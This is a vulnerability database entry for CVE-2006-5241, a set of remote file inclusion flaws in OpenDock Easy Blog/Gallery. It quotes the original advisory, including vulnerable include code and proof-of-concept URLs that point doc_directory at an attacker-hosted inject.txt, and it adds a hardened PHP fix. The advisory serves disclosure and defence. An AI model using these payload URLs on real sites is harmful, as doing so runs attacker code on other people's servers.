OpenDock Easy Blog Multiple PHP Remote File Inclusion Vulnerabilities

Vulnerability ID 1111219 Vulnerability Type Input Validation
Published 2006-10-09 Updated 2006-10-20
CVE ID CVE-2006-5241 CNNVD ID CNNVD-200610-185
Platform PHP CVSS Score 5.1
|Vulnerability Source
https://www.exploit-db.com/exploits/2497
https://cxsecurity.com/issue/WLB-2006100075
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-185
|Vulnerability Details
OpenDock Easy Blog 1.4 and earlier, when register_globals is enabled, contains multiple PHP remote file inclusion vulnerabilities. A remote attacker can execute arbitrary PHP code via a URL in the doc_directory parameter of (1) file.php; (2) find_user.php, (3) lib_user.php, (4) lib_form_user.php and (5) user.php in sw/lib_user/; (6) find_session.php and (7) session.php in sw/lib_session/; (8) comment.php and (9) lib_comment.php in sw/lib_comment/; and other unspecified PHP scripts.
|Vulnerability EXP
ECHO_ADV_52$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_52$2006]OpenDock Easy Gallery <=1.4 (doc_directory) Multiple Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author          : Dedi Dwianto a.k.a the_day
Date Found      : October, 09th 2006
Location        : Indonesia, Jakarta
web             : http://advisories.echo.or.id/adv/adv52-theday-2006.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application     : OpenDock Easy Gallery
version         : <=1.4
URL             : http://web.opendock.net

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

In folder sw/lib_up_file/ I found a vulnerable script, file.php
--------------------------file.php---------------------------------------
....
<?

 include $doc_directory.$path_sw."lib_up_file/lib_file.php";
 include $doc_directory.$path_sw."lib_up_file/lib_form_file.php";
 include $doc_directory.$path_sw."lib_up_file/lib_read_file.php";
 include $doc_directory.$path_sw."lib_up_file/lib_page_file.php";
 include $doc_directory.$path_sw."lib_up_file/find_file.php";
 include $doc_directory.$path_sw."lib_up_file/down_stat.php";

...
----------------------------------------------------------

Input passed to the "$doc_directory" parameter in file.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Other affected files:

sw/lib_user/find_user.php
sw/lib_user/lib_user.php
sw/lib_user/lib_form_user.php
sw/lib_user/user.php
sw/lib_session/find_session.php
sw/lib_session/session.php
sw/lib_comment/comment.php
sw/lib_comment/lib_comment.php
etc..



Proof Of Concept:
~~~~~~~~~~~~~~

http://target.com/[OpenDockEasyGallery_Path]/sw/lib_user/find_user.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyGallery_Path]/sw/lib_user/user.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyGallery_Path]/sw/lib_comment/comment.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyGallery_Path]/sw/lib_session/session.php?doc_directory=http://attacker.com/inject.txt?

Solution:
~~~~~~
- Sanitize variable $doc_directory on affected files.
- Turn off register_globals

Timeline:
~~~~~~
09 - 10 - 2006 Bugs Found
09 - 10 - 2006 Vendor Contact
09 - 10 - Public Disclosure

---------------------------------------------------------------------------

Shoutz:
~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,boom_3x,mathdule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~
    EcHo Research & Development Center
    the_day[at]echo[dot]or[dot]id

# milw0rm.com [2006-10-09]
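The advisory's Solution section says to sanitize $doc_directory and turn off register_globals. The following is an added example of what that fix looks like in code; it is not part of the advisory or of OpenDock, and it assumes the application root is the directory containing the sw/ tree and that the sub-path "sw/" is fixed rather than request-supplied.

```php
<?php
// Added example (not OpenDock code): hardened replacement for the
// `include $doc_directory.$path_sw."lib_up_file/lib_file.php"` pattern.
// Assumptions: this file sits in the application root, and the library
// sub-path is the constant "sw/" instead of the request-settable $path_sw.

// 1. Never let the include root come from a request variable. Derive it
//    from the filesystem position of the application itself.
define('DOC_DIRECTORY', realpath(__DIR__) . DIRECTORY_SEPARATOR);
define('PATH_SW', 'sw' . DIRECTORY_SEPARATOR);

// 2. Discard any value a register_globals-enabled server may have
//    injected from ?doc_directory=... or ?path_sw=..., so no later code
//    can pick it up by accident even before the ini setting is fixed.
unset($doc_directory, $path_sw);

/**
 * Resolve a library file name to an absolute path that must lie inside
 * DOC_DIRECTORY . PATH_SW. Returns null when resolution fails or the
 * result escapes the allowed tree (stream wrappers, "../", absolute paths).
 */
function safe_lib_path(string $relative): ?string
{
    // Reject anything that looks like a stream wrapper (http://, ftp://,
    // php://, data:) before touching the filesystem at all.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $relative)) {
        return null;
    }
    $base   = realpath(DOC_DIRECTORY . PATH_SW);
    $target = realpath(DOC_DIRECTORY . PATH_SW . $relative);
    if ($base === false || $target === false) {
        return null;               // no such file, or base dir missing
    }
    // realpath() has already collapsed "..", symlinks and duplicate
    // slashes, so a prefix check is now a reliable containment test.
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $target;
}

// 3. Every include goes through the check; a failed check aborts instead
//    of silently including whatever the request asked for.
foreach (['lib_up_file/lib_file.php', 'lib_up_file/lib_form_file.php'] as $lib) {
    $p = safe_lib_path($lib);
    if ($p === null) {
        http_response_code(500);
        exit('library resolution failed');
    }
    require $p;
}
```

Disabling register_globals in php.ini remains the primary fix; the unset() and the fixed constants only make the scripts safe on hosts where that setting cannot be changed.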
|References

Source: XF
Name: opendock-gallery-docdirectory-file-include(29417)
Link: http://xforce.iss.net/xforce/xfdb/29417
Source: BID
Name: 20411
Link: http://www.securityfocus.com/bid/20411
Source: BUGTRAQ
Name: 20061009[ECHO_ADV_52$2006]OpenDockEasyGallery<=1.4(doc_directory)MultipleRemoteFileInclusionVulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/448027/100/0/threaded
Source: MILW0RM
Name: 2497
Link: http://www.milw0rm.com/exploits/2497
Source: VUPEN
Name: ADV-2006-3969
Link: http://www.frsirt.com/english/advisories/2006/3969
Source: SECTRACK
Name: 1017021
Link: http://securitytracker.com/id?1017021
Source: SECUNIA
Name: 22337
Link: http://secunia.com/advisories/22337
Source: MISC
Link: http://advisories.echo.or.id/adv/adv52-theday-2006.txt
Source: SREASON
Name: 1708
Link: http://securityreason.com/securityalert/1708
Source: MILW0RM
Name: 2497
Link: http://milw0rm.com/exploits/2497